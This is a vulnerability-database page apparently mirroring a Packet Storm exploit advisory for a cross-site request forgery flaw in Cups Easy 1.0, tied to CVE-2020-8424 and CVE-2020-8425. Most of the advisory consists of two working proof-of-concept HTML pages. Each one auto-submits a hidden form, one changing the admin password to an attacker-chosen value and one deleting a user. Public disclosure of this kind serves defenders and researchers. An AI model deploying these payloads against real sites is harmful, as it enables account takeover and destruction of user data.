Lucene search
K

Cups Easy 1.0 Cross Site Request Forgery

🗓️ 29 Jan 2020 00:00:00Reported by J3rryBl4nksType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 137 Views

Cups Easy 1.0 Cross Site Request Forgery allows admin password change and user deletio

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Cups Easy 1.0 - Cross Site Request Forgery (Password Reset) Vulnerability
29 Jan 202000:00
zdt
CVE
CVE-2020-8424
28 Jan 202022:11
cve
CVE
CVE-2020-8425
28 Jan 202022:10
cve
Cvelist
CVE-2020-8424
28 Jan 202022:11
cvelist
Cvelist
CVE-2020-8425
28 Jan 202022:10
cvelist
Exploit DB
Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)
29 Jan 202000:00
exploitdb
EUVD
EUVD-2020-29291
7 Oct 202500:30
euvd
EUVD
EUVD-2020-29292
7 Oct 202500:30
euvd
exploitpack
Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)
29 Jan 202000:00
exploitpack
NVD
CVE-2020-8424
28 Jan 202023:15
nvd
Rows per page
`# Title: Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)  
# Date: 2020-01-28  
# Exploit Author: J3rryBl4nks  
# Vendor Homepage: https://sourceforge.net/u/ajayshar76/profile/  
# Software Link: https://sourceforge.net/projects/cupseasy/files/cupseasylive-1.0/  
# Version: 1.0  
# Tested on Windows 10/Kali Rolling  
# CVE: CVE-2020-8424, CVE-2020-8425  
  
# The Cups Easy (Purchase & Inventory) 1.0 web application is vulnerable to Cross Site Request Forgery   
# that would allow an attacker to change the Admin password and gain unrestricted   
# access to the site or delete any user.  
  
# Proof of Concept Code for Password Change:  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://SITEADDRESS/cupseasylive/passwordmychange.php" method="POST">  
<input type="hidden" name="username" value="admin" />  
<input type="hidden" name="password" value="PASSWORDHERE" />  
<input type="hidden" name="change" value="Change" />  
<input type="submit" value="Submit request" />  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
  
# Proof of concept for user delete:  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://SITEADDRESS/cupseasylive/userdelete.php" method="POST">  
<input type="hidden" name="username" value="admin" />  
<input type="hidden" name="delete" value="Delete" />  
<input type="submit" value="Submit request" />  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation